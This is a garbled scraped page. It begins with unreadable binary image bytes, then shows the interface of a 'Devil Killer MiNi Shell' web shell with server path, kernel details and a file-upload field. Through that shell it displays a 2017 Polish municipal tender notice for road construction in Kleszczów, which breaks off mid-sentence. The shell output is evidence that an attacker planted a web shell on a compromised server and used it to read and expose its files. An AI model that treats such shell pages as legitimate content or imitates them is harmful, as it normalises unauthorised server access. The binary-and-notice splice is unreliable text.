JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170529/519017-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 519017-N-2017 z dnia 2017-05-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Kleszczów</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Rozbudowa drogi powiatowej Kleszczów- Łuszczanowice oraz budowa drogi gminnej w Łękińsku- wraz z infrastrukturą techniczną </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii"></span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy"></span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Kleszczów</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">59064798300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Główna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">47</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">97410 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kleszczów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">(044) 731 31 10</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zampub@kleszczow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">(044 ) 731 31 30</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.kleszczow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.kleszczow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">ofertę należy złożyć w formie pisemnej w siedzibie Zamwiającego - Gmina Kleszczów</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Główna 47, 97-410 Kleszczów - Kancelaria ogólna</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Rozbudowa drogi powiatowej Kleszczów- Łuszczanowice oraz budowa drogi gminnej w Łękińsku- wraz z infrastrukturą techniczną </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.11.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Rozbudowa drogi powiatowej Kleszczów- Łuszczanowice oraz budowa drogi gminnej w Łękińsku- wraz z infrastrukturą techniczną Część 1 : ,,Rozbudowa drogi powiatowej 1921E na odcinku od skrzyżowania z ul. Przemysłową i Łączną w Kleszczowie (101417E) do wsi Łuszczanowice (ul. Ogrodowa) wraz z infrastrukturą techniczną o dł. drogi ok. 1,2km"Część 2:,,Budowa drogi gminnej na odcinku od ul. Ustronnej do ul. Północnej w Łękińsku wraz z infrastrukturą techniczną o dł. drogi ok. 650 mb"</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233140-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>34922100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233290-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231300-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232400-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232100-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316110-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231220-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231400-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232221-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45314000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45232000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45230000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">18</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający stawia szczegółowe minimalne wymagania w zakresie oceny tych zdolności.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową w kwocie nie mniejszej dla:Części 1: 900.000,00 zł (słownie: dziewięćset tysięcy złotych 00/100)Części 2: 600.000,00 zł (słownie: sześćset tysięcy złotych 00/100)W przypadku składania oferty zarówno na cześć 1 i 2 zamówienia Wykonawca zobowiązany jest do wykazania, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 1.500.000,00 zł (jeden milion pięćset tysięcy złotych 00/100).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający stawia szczegółowe minimalne wymagania w zakresie oceny tych zdolności o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą:Dla części 1minimalne poziomy zdolności w zakresie doświadczenia tj. wykażą iż wykonali: zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: a. minimum trzykrotnie zrealizowali w ramach odrębnych umów budowę lub przebudowę drogi publicznej o długości odcinka (kilometraż) drogi minimum 1,0 km każda. b.	wybudował minimum jedną linię elektroenergetyczną kablową (lub kilka) niskiego napięcia o łącznej długości minimum 3,0 km, (Uwaga: Linie kablowe oświetlenia ulicznego nie są liniami elektroenergetycznymi nn)Wymaganym doświadczeniem (wymienionym w ppkt a lub b) winien wykazać się albo Wykonawca samodzielnie, albo jeden podmiot, który mu udostępnia zasoby albo jeden z Wykonawców składających ofertę wspólną.Dla części 2minimalne poziomy zdolności w zakresie doświadczenia tj. wykażą iż wykonali: zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: a.	co najmniej trzykrotnie zrealizowali w ramach odrębnych umów (zadań): budowę lub przebudowę drogi publicznej o długości odcinka (kilometraż) drogi co najmniej 0,5 km każda, b.	wybudował co najmniej jedną kompletną stację transformatorową SN/nn (z wyłączeniem napowietrznych stacji transformatorowych słupowych), c.	wybudował co najmniej jedną linię elektroenergetyczną kablową (lub kilka) średniego napięcia o łącznej długości minimum 0,5 km, d.	wybudował co najmniej jedną linię elektroenergetyczną kablową (lub kilka) niskiego napięcia o łącznej długości minimum 1,0 km (Uwaga: linie kablowe oświetlenia ulicznego nie są liniami elektroenergetycznymi nn).Wymaganym doświadczeniem (wymienionym w ppkt a lub b lub c lub d) winien wykazać się albo Wykonawca samodzielnie, albo jeden podmiot, który mu udostępnia zasoby albo jeden z Wykonawców składających ofertę wspólną.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.Uwaga:Dokumenty potwierdzające brak podstaw do wykluczenia składa odpowiednio: Wykonawca ( w przypadku składania oferty wspólnej - każdy ze wspólników konsorcjum lub przez spółkę cywilną, każdy ze wspólników konsorcjum lub spółki cywilnej), oraz podmioty na których zasoby powołuje się Wykonawca w celu spełniania warunków udziału w postępowaniu.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) informację banku lub 